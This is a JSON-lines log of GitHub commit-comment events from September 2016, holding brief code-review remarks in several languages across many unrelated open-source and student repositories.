{"id":"4517842439","type":"CommitCommentEvent","actor":{"login":"ziyan-junaideen"},"repo":{"name":"jdeen/xkpassword"},"payload":{"comment":{"id":18902518,"position":7,"line":7,"path":".travis.yml","commit_id":"e2b84d14a05f19cee6296686cfb36c10a02cc22b","created_at":"2016-09-05T17:22:41Z","updated_at":"2016-09-05T17:22:41Z","body":"Noted, thanks. Was planning to add Rubocop and update some code. Will put it on the list."}},"created_at":"2016-09-05T17:22:41Z"}
{"id":"4517844306","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902521,"position":44,"line":54,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:23:23Z","updated_at":"2016-09-05T17:23:23Z","body":"Other similar cases I can think of:\r\n- `filter`: expression\r\n- `filter`: comparator\r\n- `orderBy`: comparator"}},"created_at":"2016-09-05T17:23:23Z"}
{"id":"4517846327","type":"CommitCommentEvent","actor":{"login":"philparadis"},"repo":{"name":"micro222/chatbot"},"payload":{"comment":{"id":18902528,"position":null,"line":null,"path":null,"commit_id":"afde0f32a401d541b925cde4151f8a1d5b5d1126","created_at":"2016-09-05T17:24:16Z","updated_at":"2016-09-05T17:24:16Z","body":"Thank you for the amazing update to the most important file of this project. Very helpful!"}},"created_at":"2016-09-05T17:24:16Z"}
{"id":"4517849794","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18902536,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-05T17:25:38Z","updated_at":"2016-09-05T17:25:38Z","body":"Would it be too fragile to just check for changes that add `PR` or `Pull Request` to the `dangerfile_gitlab_plugin.rb` file?"}},"created_at":"2016-09-05T17:25:38Z"}
{"id":"4517850206","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902538,"position":65,"line":74,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:25:45Z","updated_at":"2016-09-05T17:25:45Z","body":"<sub>This is the only entry in the list wiht a period at the end :grin:</sub>"}},"created_at":"2016-09-05T17:25:45Z"}
{"id":"4517850406","type":"CommitCommentEvent","actor":{"login":"TiagoBezerra"},"repo":{"name":"andreqbs/e-star"},"payload":{"comment":{"id":18902539,"position":null,"line":null,"path":null,"commit_id":"ed50029629059c9115353a8f2c8f0309c51655b5","created_at":"2016-09-05T17:25:54Z","updated_at":"2016-09-05T17:25:54Z","body":"Tomar como modelos os seguintes arquivos, para o desenvolvimento do banco de dados: \"New ER Diagram.erdplus_2\" e \"erdplus-diagrama_2_.png\".\r\n\r\nAtt:\r\nTiago Bezerra  "}},"created_at":"2016-09-05T17:25:54Z"}
{"id":"4517851474","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18902542,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-05T17:26:21Z","updated_at":"2016-09-05T17:26:21Z","body":"IMO, nah, especially if its `\" PR \"` or `\" Pull Request \"`"}},"created_at":"2016-09-05T17:26:21Z"}
{"id":"4517852953","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":18902546,"position":5,"line":5,"path":"nathan-programming-puzzles-5-4.py","commit_id":"5893d97a00f0353229abde474c350395aea0f3d3","created_at":"2016-09-05T17:26:58Z","updated_at":"2016-09-05T17:26:58Z","body":"What the book is *trying* to say is that only one of these messages should be printed out."}},"created_at":"2016-09-05T17:26:58Z"}
{"id":"4517853286","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902547,"position":68,"line":77,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:27:03Z","updated_at":"2016-09-05T17:27:03Z","body":"Shouldn't you sanitize such CSS or URLs anyway?"}},"created_at":"2016-09-05T17:27:03Z"}
{"id":"4517858463","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18902553,"position":7,"line":37,"path":"src/ng/parse.js","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-05T17:29:10Z","updated_at":"2016-09-05T17:29:10Z","body":"Wrt: _So it is now possible_\r\nIt was possible before. Did you mean _\"it is now easier\"_?"}},"created_at":"2016-09-05T17:29:10Z"}
{"id":"4517861707","type":"CommitCommentEvent","actor":{"login":"Yehonal"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":18902563,"position":null,"line":null,"path":null,"commit_id":"209c058368cc669714e219d4366fc88135bea26f","created_at":"2016-09-05T17:30:26Z","updated_at":"2016-09-05T17:30:26Z","body":"@mars8022 http://azerothcore.altervista.org/forum/viewtopic.php?f=2&t=15\r\n\r\nif you were using visual studio 2013, please upgrade it to 2015"}},"created_at":"2016-09-05T17:30:26Z"}
{"id":"4517862010","type":"CommitCommentEvent","actor":{"login":"Di3trich"},"repo":{"name":"Di3trich/avisame_pe"},"payload":{"comment":{"id":18902564,"position":6,"line":39,"path":"frontend/homepage/templates/main-template.html","commit_id":"14e3325acc1f1d3dc10d800d37bfd5912dc0c142","created_at":"2016-09-05T17:30:33Z","updated_at":"2016-09-05T17:30:33Z","body":"utiliza row-fluid"}},"created_at":"2016-09-05T17:30:33Z"}
{"id":"4517866086","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"MorbZ/OSMonaut"},"payload":{"comment":{"id":18902573,"position":5,"line":240,"path":"src/main/java/net/morbz/osmonaut/binary/pbf/PbfDecoder.java","commit_id":"a76d57bed50171fe89815fbd27f11d2b12d5776a","created_at":"2016-09-05T17:32:16Z","updated_at":"2016-09-05T17:32:16Z","body":"Printing the stack if there is an exception is very dangerous IMO\r\n"}},"created_at":"2016-09-05T17:32:16Z"}
{"id":"4517866199","type":"CommitCommentEvent","actor":{"login":"reinpk"},"repo":{"name":"segmentio/nightmarejs.org"},"payload":{"comment":{"id":18902574,"position":null,"line":null,"path":null,"commit_id":"1b6a9f5a32615abe1a35b0fd3f9973d0b0999328","created_at":"2016-09-05T17:32:18Z","updated_at":"2016-09-05T17:32:18Z","body":"i was trying to set up server-side tracking on saturday. it worked locally, but when i deployed to heroku it didn't work, and i couldn't get the logging to show up. so i abandoned it."}},"created_at":"2016-09-05T17:32:18Z"}
{"id":"4517866966","type":"CommitCommentEvent","actor":{"login":"Coolman9451"},"repo":{"name":"Coolman9451/3DSController"},"payload":{"comment":{"id":18902576,"position":null,"line":null,"path":null,"commit_id":"edfa656b0d471fb4614a6edcc5e71c4f2ea15324","created_at":"2016-09-05T17:32:39Z","updated_at":"2016-09-05T17:32:39Z","body":"I removed the 3dsx, elf, smdh files, and the build folders. I also included a c source code for an image that had text \"Touch to continue\"."}},"created_at":"2016-09-05T17:32:39Z"}
{"id":"4517867300","type":"CommitCommentEvent","actor":{"login":"tiran"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18902577,"position":125,"line":804,"path":"Lib/ssl.py","commit_id":"75990d0e0e3f8439f3936797c0aacb1df3c0c74c","created_at":"2016-09-05T17:32:47Z","updated_at":"2016-09-05T17:32:47Z","body":"Of course! I added a check and updated the unit test suite to verify both conditions."}},"created_at":"2016-09-05T17:32:47Z"}
{"id":"4517869699","type":"CommitCommentEvent","actor":{"login":"mmoreram"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902584,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:33:42Z","updated_at":"2016-09-05T17:33:42Z","body":"please... don't do that :-1: "}},"created_at":"2016-09-05T17:33:42Z"}
{"id":"4517870779","type":"CommitCommentEvent","actor":{"login":"heikkil"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18902586,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T17:34:10Z","updated_at":"2016-09-05T17:34:10Z","body":"Perfect. Just what  meant. Thanks.\r\n\r\nNow all is needed is to get it into MELPA. :)\r\n\r\nMinor issues still remaining:\r\n\r\n1. No installation section in README\r\n\r\n2. outdated date stamp in org-preview-html.el :\r\n;; Created: 2015-12-27\r\n\r\n3. The line with add-hook statement still in org-preview-html.el under Quick start. \r\n\r\n"}},"created_at":"2016-09-05T17:34:10Z"}
{"id":"4517871455","type":"CommitCommentEvent","actor":{"login":"paultcochrane"},"repo":{"name":"perl6/perl6-examples"},"payload":{"comment":{"id":18902588,"position":null,"line":null,"path":null,"commit_id":"0838dc2282b57842c8530bd7bfe5e5e7a09e31c3","created_at":"2016-09-05T17:34:25Z","updated_at":"2016-09-05T17:34:25Z","body":"@shlomif thanks for your quick reply! Debug flag added."}},"created_at":"2016-09-05T17:34:25Z"}
{"id":"4517871603","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"MorbZ/OSMonaut"},"payload":{"comment":{"id":18902589,"position":39,"line":39,"path":"src/main/java/net/morbz/osmonaut/MemoryEntityMap.java","commit_id":"a76d57bed50171fe89815fbd27f11d2b12d5776a","created_at":"2016-09-05T17:34:29Z","updated_at":"2016-09-05T17:34:29Z","body":"This seems like a really nice storage. Did you implemented some unit tests for this? (Cannot find them in this repo)"}},"created_at":"2016-09-05T17:34:29Z"}
{"id":"4517872251","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18902590,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T17:34:44Z","updated_at":"2016-09-05T17:34:44Z","body":"bc5bcad"}},"created_at":"2016-09-05T17:34:44Z"}
{"id":"4517874846","type":"CommitCommentEvent","actor":{"login":"jfeng702"},"repo":{"name":"jfeng702/NewRepo"},"payload":{"comment":{"id":18902598,"position":null,"line":null,"path":null,"commit_id":"643878cc56bee8aa203041c5fcb94e5c6faf91a2","created_at":"2016-09-05T17:35:49Z","updated_at":"2016-09-05T17:35:49Z","body":"player_total and dealer_total will not update using the evaluate method as more cards get added to the hands."}},"created_at":"2016-09-05T17:35:49Z"}
{"id":"4517876467","type":"CommitCommentEvent","actor":{"login":"juniorgonzalez1997"},"repo":{"name":"juniorgonzalez1997/segundo"},"payload":{"comment":{"id":18902603,"position":null,"line":null,"path":null,"commit_id":"a789e9a237db957455054f1de32316e19bbb961e","created_at":"2016-09-05T17:36:29Z","updated_at":"2016-09-05T17:36:29Z","body":"![captura](https://cloud.githubusercontent.com/assets/22009085/18254646/5bde3fb6-7365-11e6-84ec-2b526102c2fa.PNG)\r\n![captura pngesee](https://cloud.githubusercontent.com/assets/22009085/18254647/5bdeca8a-7365-11e6-80df-91b8b2383032.PNG)\r\n![dentistas172251329732645](https://cloud.githubusercontent.com/assets/22009085/18254649/5be3c828-7365-11e6-963a-80145a4e0fd1.jpg)\r\n![2](https://cloud.githubusercontent.com/assets/22009085/18254648/5be03726-7365-11e6-8cd9-b22d80df8863.PNG)\r\n![Uploading 3.PNG…]()\r\n"}},"created_at":"2016-09-05T17:36:29Z"}
{"id":"4517879093","type":"CommitCommentEvent","actor":{"login":"pongsakornsemsuwan"},"repo":{"name":"pongsakornsemsuwan/brownbox"},"payload":{"comment":{"id":18902609,"position":4,"line":29,"path":"app/components/app.js","commit_id":"2d17af13ad492761284d5d0aba013b3a68118ea9","created_at":"2016-09-05T17:37:37Z","updated_at":"2016-09-05T17:37:37Z","body":"จากที่เข้าใจ มันจะเข้า componentDidUpdate ก้ต่อเมื่อ ยังไงซะ component นี้มันก้จะถูกอัพเดทอยุ่แล้ว (ต่อให้ดัก/ไม่ดัก อีเว้นนี้อะ) ที่เราดักให้มันแก้ title ไม่น่าจะเป็นการ force ให้มันอัพเดท dom นะ"}},"created_at":"2016-09-05T17:37:37Z"}
{"id":"4517879185","type":"CommitCommentEvent","actor":{"login":"PRJosh"},"repo":{"name":"Flinny/android_build"},"payload":{"comment":{"id":18902610,"position":null,"line":null,"path":null,"commit_id":"3b7c4f2991fde584d12487b0777cb3098836c66b","created_at":"2016-09-05T17:37:39Z","updated_at":"2016-09-05T17:37:39Z","body":"We are not CM, build expects this check-api\r\n\r\nninja: error: 'checkapi-cm', needed by '/home/prbassplayer/ng7.0/out/target/product/flounder/obj/PACKAGING/systemimage_intermediates/system.img', missing and no known rule to make it\r\n"}},"created_at":"2016-09-05T17:37:39Z"}
{"id":"4517880131","type":"CommitCommentEvent","actor":{"login":"sourcerer-mike"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902618,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:38:03Z","updated_at":"2016-09-05T17:38:03Z","body":"Oh. Thanks for the comment.\r\nDon't do what?\r\n\r\nHaving null as default? (yup, this needs to die as it could break everything)\r\nOr using the ContainerAwareInterface or having a service container in here at all? ^^\r\n\r\nCheers"}},"created_at":"2016-09-05T17:38:03Z"}
{"id":"4517881682","type":"CommitCommentEvent","actor":{"login":"ksmith0"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":18902624,"position":null,"line":null,"path":null,"commit_id":"916271ec7a520eea9f85220666eced1a86e779f9","created_at":"2016-09-05T17:38:41Z","updated_at":"2016-09-05T17:38:41Z","body":"This commit caused an unresolvable merge due to the change is tab characters. "}},"created_at":"2016-09-05T17:38:41Z"}
{"id":"4517881920","type":"CommitCommentEvent","actor":{"login":"danieledenaro"},"repo":{"name":"open-electronics/RandA"},"payload":{"comment":{"id":18902625,"position":null,"line":null,"path":null,"commit_id":"0ddbff90b431a55f7815f3e417270e84c0d6f831","created_at":"2016-09-05T17:38:47Z","updated_at":"2016-09-05T17:38:47Z","body":"Last Version is V1.5 (see release tab)"}},"created_at":"2016-09-05T17:38:47Z"}
{"id":"4517883134","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18902628,"position":null,"line":null,"path":null,"commit_id":"374f5553e4ee6bf15b19fb28bf9918ba1493a5e5","created_at":"2016-09-05T17:39:13Z","updated_at":"2016-09-05T17:39:13Z","body":"Qué hacemos con @Muchachito \r\nCuando subas una nueva app, recuerda que estamos en el idioma español\r\n/res/values-es/"}},"created_at":"2016-09-05T17:39:13Z"}
{"id":"4517884389","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18902631,"position":null,"line":null,"path":null,"commit_id":"374f5553e4ee6bf15b19fb28bf9918ba1493a5e5","created_at":"2016-09-05T17:39:43Z","updated_at":"2016-09-05T17:39:43Z","body":"values/ es para el idioma nativo de la rom, el inglés."}},"created_at":"2016-09-05T17:39:43Z"}
{"id":"4517887379","type":"CommitCommentEvent","actor":{"login":"patricioe"},"repo":{"name":"splitio/.net-client"},"payload":{"comment":{"id":18902635,"position":23,"line":149,"path":"NetSDK/Services/Client/Classes/SelfRefreshingClient.cs","commit_id":"f44b96406a913440d89b2cb68c8c76055ef45b4c","created_at":"2016-09-05T17:40:49Z","updated_at":"2016-09-05T17:40:49Z","body":"did you mean to write `null`?"}},"created_at":"2016-09-05T17:40:49Z"}
{"id":"4517887648","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"Cane4ek/lemon.school"},"payload":{"comment":{"id":18902637,"position":52,"line":52,"path":"4/style.css","commit_id":"014cbd4dbc178af3c0e2009c092861ce1d501e4f","created_at":"2016-09-05T17:40:56Z","updated_at":"2016-09-05T17:40:56Z","body":"не цепляй стили на `id`"}},"created_at":"2016-09-05T17:40:56Z"}
{"id":"4517887860","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"Cane4ek/lemon.school"},"payload":{"comment":{"id":18902639,"position":42,"line":42,"path":"4/style.css","commit_id":"014cbd4dbc178af3c0e2009c092861ce1d501e4f","created_at":"2016-09-05T17:41:00Z","updated_at":"2016-09-05T17:41:00Z","body":"не цепляй стили на `id`"}},"created_at":"2016-09-05T17:41:00Z"}
{"id":"4517890042","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18902644,"position":null,"line":null,"path":null,"commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-05T17:41:51Z","updated_at":"2016-09-05T17:41:51Z","body":"@boxa iam not able to reproduce it. Do you have a way to do so?"}},"created_at":"2016-09-05T17:41:51Z"}
{"id":"4517890696","type":"CommitCommentEvent","actor":{"login":"patricioe"},"repo":{"name":"splitio/.net-client"},"payload":{"comment":{"id":18902648,"position":27,"line":27,"path":"NetSDK/Services/Impressions/Classes/BlockingQueue.cs","commit_id":"f44b96406a913440d89b2cb68c8c76055ef45b4c","created_at":"2016-09-05T17:42:07Z","updated_at":"2016-09-05T17:42:07Z","body":"what type of lock is this?"}},"created_at":"2016-09-05T17:42:07Z"}
{"id":"4517893432","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"Cane4ek/lemon.school"},"payload":{"comment":{"id":18902660,"position":57,"line":57,"path":"4/style.css","commit_id":"014cbd4dbc178af3c0e2009c092861ce1d501e4f","created_at":"2016-09-05T17:43:12Z","updated_at":"2016-09-05T17:43:12Z","body":"это можно заменить псевдоэлементом `::after`"}},"created_at":"2016-09-05T17:43:12Z"}
{"id":"4517894701","type":"CommitCommentEvent","actor":{"login":"mmoreram"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902664,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:43:45Z","updated_at":"2016-09-05T17:43:45Z","body":"Do you need the whole container to instance an Address? Just ask yourself this question :)"}},"created_at":"2016-09-05T17:43:45Z"}
{"id":"4517895366","type":"CommitCommentEvent","actor":{"login":"jwaimann"},"repo":{"name":"splitio/.net-client"},"payload":{"comment":{"id":18902667,"position":27,"line":27,"path":"NetSDK/Services/Impressions/Classes/BlockingQueue.cs","commit_id":"f44b96406a913440d89b2cb68c8c76055ef45b4c","created_at":"2016-09-05T17:44:01Z","updated_at":"2016-09-05T17:44:01Z","body":"it locks the thread that atempts to add an item to the queue until the \"copy and clear\" finish"}},"created_at":"2016-09-05T17:44:01Z"}
{"id":"4517895846","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18902668,"position":null,"line":null,"path":null,"commit_id":"1a66372e9b5289ef5dee69f44f28969f6d9dcacb","created_at":"2016-09-05T17:44:14Z","updated_at":"2016-09-05T17:44:14Z","body":"Luckily the changed it quickly :) But indeed, didn't pay attention to it enough. "}},"created_at":"2016-09-05T17:44:14Z"}
{"id":"4517895902","type":"CommitCommentEvent","actor":{"login":"tallus"},"repo":{"name":"SEED-platform/seed"},"payload":{"comment":{"id":18902669,"position":null,"line":null,"path":null,"commit_id":"66918cf5a03760e04cf609d5f92f0cda8c526eda","created_at":"2016-09-05T17:44:15Z","updated_at":"2016-09-05T17:44:15Z","body":"I'm working on these at the moment, I didn't think these had made it into a commit, there will be a separate pull request. "}},"created_at":"2016-09-05T17:44:15Z"}
{"id":"4517897148","type":"CommitCommentEvent","actor":{"login":"mmoreram"},"repo":{"name":"sourcerer-mike/crmp"},"payload":{"comment":{"id":18902670,"position":25,"line":25,"path":"src/Crmp/CrmBundle/DomainRepository/Addresses.php","commit_id":"89adfcfdb44dc141cb1d7dde237deb3b7a619308","created_at":"2016-09-05T17:44:47Z","updated_at":"2016-09-05T17:44:47Z","body":"In this case, at least till now, you only need the EntityManager, so inject only the entity manager :)"}},"created_at":"2016-09-05T17:44:47Z"}
{"id":"4517897173","type":"CommitCommentEvent","actor":{"login":"camcory"},"repo":{"name":"camcory/Superuser"},"payload":{"comment":{"id":18902671,"position":null,"line":null,"path":null,"commit_id":"80c40455bb9e9dd58d11950e1edbf5b5bc45a212","created_at":"2016-09-05T17:44:48Z","updated_at":"2016-09-05T17:44:48Z","body":"Images\r\nLight\r\nhttp://imgur.com/gBVHFOw\r\nhttp://imgur.com/JNHYVxh\r\n\r\nDark\r\nhttp://imgur.com/SCSaQJp\r\nhttp://imgur.com/nObtLow\r\n"}},"created_at":"2016-09-05T17:44:48Z"}
{"id":"4517898720","type":"CommitCommentEvent","actor":{"login":"jwaimann"},"repo":{"name":"splitio/.net-client"},"payload":{"comment":{"id":18902672,"position":27,"line":27,"path":"NetSDK/Services/Impressions/Classes/BlockingQueue.cs","commit_id":"f44b96406a913440d89b2cb68c8c76055ef45b4c","created_at":"2016-09-05T17:45:29Z","updated_at":"2016-09-05T17:45:29Z","body":"But I will change it to a specifig lock object, I'm sorry I commit it by mistake"}},"created_at":"2016-09-05T17:45:29Z"}
{"id":"4517899490","type":"CommitCommentEvent","actor":{"login":"R41z"},"repo":{"name":"ioanmoldovan/retrotech"},"payload":{"comment":{"id":18902675,"position":null,"line":null,"path":null,"commit_id":"677d9da6fd8d75b50793c909a550f4866fee2898","created_at":"2016-09-05T17:45:50Z","updated_at":"2016-09-05T17:45:50Z","body":"GPL for a template? too much"}},"created_at":"2016-09-05T17:45:50Z"}
{"id":"4517903671","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902688,"position":7,"line":7,"path":"app/factories/data.factory.js","commit_id":"569aeaff801900f26aca88a3b86346d45ab98d98","created_at":"2016-09-05T17:47:42Z","updated_at":"2016-09-05T17:47:42Z","body":"Обычно, не используют 'this' для фабрик, они сохраняют контекст, который обхвляется внутри функции-создателя самой фабрики.\r\n"}},"created_at":"2016-09-05T17:47:42Z"}
{"id":"4517908401","type":"CommitCommentEvent","actor":{"login":"spaulaus"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":18902703,"position":null,"line":null,"path":null,"commit_id":"916271ec7a520eea9f85220666eced1a86e779f9","created_at":"2016-09-05T17:49:47Z","updated_at":"2016-09-05T17:49:47Z","body":"Generating a Pull Request did not show any unresolveable merges. "}},"created_at":"2016-09-05T17:49:47Z"}
{"id":"4517909077","type":"CommitCommentEvent","actor":{"login":"scvnc"},"repo":{"name":"podverse/podverse-web"},"payload":{"comment":{"id":18902705,"position":11,"line":54,"path":"src/services/clip/ClipService.js","commit_id":"8cac8d1e70e97c229b604f617a5168dca71bbddb","created_at":"2016-09-05T17:50:04Z","updated_at":"2016-09-05T17:50:04Z","body":"@mitchdowney Worth noting what I am slowly scratching away at in this branch-- moving over to the PostgreSQL database.  The tests caught issues right away.  I'm developing this branch assuming Docker is installed and available too."}},"created_at":"2016-09-05T17:50:04Z"}
{"id":"4517909910","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18902709,"position":null,"line":null,"path":null,"commit_id":"371a3b429698850b249642502a32f6ef9188b974","created_at":"2016-09-05T17:50:23Z","updated_at":"2016-09-05T17:50:23Z","body":"I am waiting to see what is decided with https://github.com/music-encoding/music-encoding/issues/338\r\nIf ```@type``` is made available globally and as multiple token then we can preserve it tine the SVG output and we probably won't need this anymore."}},"created_at":"2016-09-05T17:50:23Z"}
{"id":"4517910090","type":"CommitCommentEvent","actor":{"login":"patricioe"},"repo":{"name":"splitio/.net-client"},"payload":{"comment":{"id":18902710,"position":95,"line":96,"path":"NetSDK/Services/Impressions/Classes/SelfUpdatingTreatmentLog.cs","commit_id":"f44b96406a913440d89b2cb68c8c76055ef45b4c","created_at":"2016-09-05T17:50:28Z","updated_at":"2016-09-05T17:50:28Z","body":"Is this reusing the same thread?"}},"created_at":"2016-09-05T17:50:28Z"}
{"id":"4517910308","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18902711,"position":13,"line":181,"path":"js/init.js","commit_id":"a1b431573d9544814390c4500d42f2bd9c750e37","created_at":"2016-09-05T17:50:33Z","updated_at":"2016-09-05T17:50:33Z","body":"'Added tag successfully'"}},"created_at":"2016-09-05T17:50:33Z"}
{"id":"4517910677","type":"CommitCommentEvent","actor":{"login":"thomas-mangin"},"repo":{"name":"brijohn/exabgp"},"payload":{"comment":{"id":18902712,"position":null,"line":null,"path":null,"commit_id":"4ca039e834577d7a7f285659a4f852177cfc1150","created_at":"2016-09-05T17:50:44Z","updated_at":"2016-09-05T17:50:44Z","body":"Could you please send me a PR for both 3.4 and master ?"}},"created_at":"2016-09-05T17:50:44Z"}
{"id":"4517911412","type":"CommitCommentEvent","actor":{"login":"Zayelion"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18902715,"position":null,"line":null,"path":null,"commit_id":"124ef5614865a9920c764f8241f97ade100bdf8b","created_at":"2016-09-05T17:51:07Z","updated_at":"2016-09-05T17:51:07Z","body":"This can be abstracted by a theme system, and then just becomes a user preference."}},"created_at":"2016-09-05T17:51:07Z"}
{"id":"4517911615","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902716,"position":null,"line":null,"path":null,"commit_id":"c0979b5b1774fcc893a3b1db7696666ec6a396c6","created_at":"2016-09-05T17:51:12Z","updated_at":"2016-09-05T17:51:12Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/399/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T17:51:12Z"}
{"id":"4517912079","type":"CommitCommentEvent","actor":{"login":"SunsMan"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18902718,"position":11,"line":11,"path":"app/services/data.service.js","commit_id":"569aeaff801900f26aca88a3b86346d45ab98d98","created_at":"2016-09-05T17:51:23Z","updated_at":"2016-09-05T17:51:23Z","body":"Если это сервис - почему в нем что-то возвращается? Сервис возвращает самого себя по умолчанию, то есть все, что запишешь в 'this'"}},"created_at":"2016-09-05T17:51:23Z"}
{"id":"4517912373","type":"CommitCommentEvent","actor":{"login":"bdcoe"},"repo":{"name":"Big-Data-Centre-of-Excellence/BDCoE-Trainee-2016"},"payload":{"comment":{"id":18902719,"position":null,"line":null,"path":null,"commit_id":"13fd5d0157f714774a870a299c95b27a5800a902","created_at":"2016-09-05T17:51:31Z","updated_at":"2016-09-05T17:51:31Z","body":"Hello Anupam,\r\nCan you Explain that What your game is all about ? "}},"created_at":"2016-09-05T17:51:31Z"}
{"id":"4517912793","type":"CommitCommentEvent","actor":{"login":"antirius"},"repo":{"name":"antirius/js-xlsx"},"payload":{"comment":{"id":18902720,"position":null,"line":null,"path":null,"commit_id":"e399941c66e1cc0c4f58858f44dd9d098b29cf1a","created_at":"2016-09-05T17:51:42Z","updated_at":"2016-09-05T17:51:42Z","body":"When the file has additional symbols, such as end of line (formatted file)\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<sst xmlns=\"http://schemas.openxmlformats.org/spreadsheetml/2006/main\" uniqueCount=\"4\" count=\"4\">\r\n  <si>\r\n    <t>4056A049</t>\r\n  </si>\r\n  <si>\r\n    <t>MITSUBISHI</t>\r\n  </si>\r\n  <si>\r\n    <t> LANCER 2007</t>\r\n  </si>\r\n  <si>\r\n    <t>4056A049</t>\r\n  </si>\r\n</sst>"}},"created_at":"2016-09-05T17:51:42Z"}
{"id":"4517913885","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":18902721,"position":29,"line":48,"path":"app/Http/Controllers/Profile/ProfileController.php","commit_id":"ec5c8c39aba7b91ffe9ca422f221bbf35e308e85","created_at":"2016-09-05T17:52:13Z","updated_at":"2016-09-05T17:52:13Z","body":"Does `member` work? (You should test this, I really am not sure. Try calling `var_dump(Auth::user()->member);` there, for example, to dump the contents. Is it `member` or `member()`?"}},"created_at":"2016-09-05T17:52:13Z"}
{"id":"4517914060","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"andrey-burmistrov/lemon-school"},"payload":{"comment":{"id":18902722,"position":11,"line":25,"path":"5/index.html","commit_id":"e0aa9aefd948aba6d1433727f8a74608e6b49987","created_at":"2016-09-05T17:52:18Z","updated_at":"2016-09-05T17:52:18Z","body":"проверь на валидаторе свою вёрстку и пойми ошибку"}},"created_at":"2016-09-05T17:52:18Z"}
